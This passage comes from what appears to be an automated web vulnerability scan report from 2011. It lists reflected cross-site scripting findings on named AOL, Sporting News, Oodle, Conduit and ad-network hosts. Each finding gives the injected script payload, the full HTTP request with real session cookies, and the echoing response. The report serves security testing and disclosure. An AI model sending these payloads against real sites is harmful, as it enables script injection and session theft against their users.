<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<meta property="og:url" content="http://www.sportingnews.com/?f16ea"><script>alert(1)</script>3359d04778d=1" />
...[SNIP]...

5.29. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [body-class parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /iframe-widgets/feed/accordion.php

Issue detail

The value of the body-class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f8b"><script>alert(1)</script>775d746b45d was submitted in the body-class parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe-widgets/feed/accordion.php?body-class=homepage20f8b"><script>alert(1)</script>775d746b45d HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:58:00 GMT
Cache-Control: max-age=60
Date: Thu, 05 May 2011 00:58:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10973

<!DOCTYPE html>
<html class="accordion-iframe" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<body class="homepage20f8b"><script>alert(1)</script>775d746b45d">
...[SNIP]...

5.30. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /iframe-widgets/feed/accordion.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c506"><script>alert(1)</script>03731420e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe-widgets/feed/accordion.php?body-class=home/7c506"><script>alert(1)</script>03731420e7cpage HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:58:00 GMT
Cache-Control: max-age=60
Date: Thu, 05 May 2011 00:58:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10974

<!DOCTYPE html>
<html class="accordion-iframe" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<body class="home/7c506"><script>alert(1)</script>03731420e7cpage">
...[SNIP]...

5.31. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The value of the dimension request parameter is copied into the HTML document as plain text between tags. The payload 39601<script>alert(1)</script>ba982c7c28d was submitted in the dimension parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15039601<script>alert(1)</script>ba982c7c28d&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:55:00 GMT
Cache-Control: max-age=283
Date: Thu, 05 May 2011 00:59:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4829

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-size:11px; color:#000; }
#fs { display:block; width:180px; height:15039601<script>alert(1)</script>ba982c7c28dpx; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15039601<script>
...[SNIP]...

5.32. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The value of the dimension request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9e5"><script>alert(1)</script>0234b75261d was submitted in the dimension parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150aa9e5"><script>alert(1)</script>0234b75261d&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:55:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 00:59:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4851

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<div id="fs" class="ad-180x150aa9e5"><script>alert(1)</script>0234b75261d">
...[SNIP]...

5.33. http://apartments.rentedspaces.oodle.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.rentedspaces.oodle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b68bb"><script>alert(1)</script>17755f1e103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b68bb"><script>alert(1)</script>17755f1e103=1 HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: Ym9uZXM=
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 10:52:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=2185e70315ab611df10e714ffdfebac5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=b8aabdc0f23d046c06b479adb5ae1264; path=/; domain=.oodle.com
Set-Cookie: a=dT1EMjEwMzc1MjREQzI4MTgy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NTkyNzcwO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 216655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/?b68bb"><script>alert(1)</script>17755f1e103=1" />
...[SNIP]...

5.34. http://apartments.rentedspaces.oodle.com/ [post_redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.rentedspaces.oodle.com
Path:   /

Issue detail

The value of the post_redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d1e"><script>alert(1)</script>0a65c36f3ad was submitted in the post_redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?post_redirect=193d1e"><script>alert(1)</script>0a65c36f3ad HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: c3VsdQ==
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 13:03:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=228eb9f281eb0d14a0310b873592e387; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=0831ab39f0c8bd5528ecac12eea81fe6; path=/; domain=.oodle.com
Set-Cookie: a=dT1ENzc5QTI2RjREQzJBMDE2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NjAwNTk4O30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 222672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/?post_redirect=193d1e"><script>alert(1)</script>0a65c36f3ad" />
...[SNIP]...

5.35. http://api.screenname.aol.com/auth/getToken [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 54dab<script>alert(1)</script>4f3d94004bb was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ao17McU4gORZ7DqV&attributes=displayName,loginId,profileUrl,pictureUrl,providerStr,providerDisplayName&f=json&c=jsonp130457501134354dab<script>alert(1)</script>4f3d94004bb HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:59 GMT
Set-Cookie: JSESSIONID=786625853431F338BA8AD4E06AC98398; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIFpoakMzOGxtK2l2TTREVGhxaVlnSE8vdVhtTT0%3D-SSQdmqasJXW7AratTMW0EY3204%2BolSyJ67U1vJszd1noF40Fu%2FJMgOz%2FgzlQ4T4HfJQB7UBTF4I%3D; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130

jsonp130457501134354dab<script>alert(1)</script>4f3d94004bb({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

5.36. https://api.screenname.aol.com/auth/getToken [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 2c3af<script>alert(1)</script>07af1547688 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ru1m1hWVLRPqEkwX&f=json&c=doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688 HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 13:01:47 GMT
Set-Cookie: JSESSIONID=1B31EE08F46C7362825E10413449A1AA; Path=/auth; Secure
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Connection: close

doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

5.37. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.conduit-banners.com
Path:   /TechCrunchApp-Techcrunch_APP

Issue detail

The value of the imageurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1dd1'%3balert(1)//12dd62a0907 was submitted in the imageurl parameter. This input was echoed as f1dd1';alert(1)//12dd62a0907 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.giff1dd1'%3balert(1)//12dd62a0907&supportedonly=1 HTTP/1.1
Host: apps.conduit-banners.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 05 May 2011 00:59:49 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 4680

function imgToGoOnLoad__1312324258(imgObj) {var elm = imgObj,func__1312324258 = function(){
SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-Ap
...[SNIP]...
<img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.giff1dd1';alert(1)//12dd62a0907" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__1312324258(this);" >
...[SNIP]...

5.38. http://apps.conduit.com/TechCrunch_App-Techcrunch_News [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://apps.conduit.com
Path:   /TechCrunch_App-Techcrunch_News

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4163b'a%3d'b'ed58c988a40 was submitted in the REST URL parameter 1. This input was echoed as 4163b'a='b'ed58c988a40 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /TechCrunch_App-Techcrunch_News4163b'a%3d'b'ed58c988a40?appid=0b9c9103-d379-409d-9edb-54745461fe64&source=8&displaytype=togo HTTP/1.1
Host: apps.conduit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:02:03 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Length: 15083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type='text/javascript' src='http://apps.conduit.com/TechCrunch_App-Techcrunch_News4163b'a='b'ed58c988a40?appid=0b9c9103-d379-409d-9edb-54745461fe64&source=8&displaytype=togo&script=1&loggeronly=1&itemsource=1'>
...[SNIP]...

5.39. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f7d49<script>alert(1)</script>573fa588bae was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae&n=ar_int_p97174789&1304575029874 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:57:18 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae("");

5.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9d8"><script>alert(1)</script>2b33d8fc33c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc88c"><script>alert(1)</script>11931b329c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
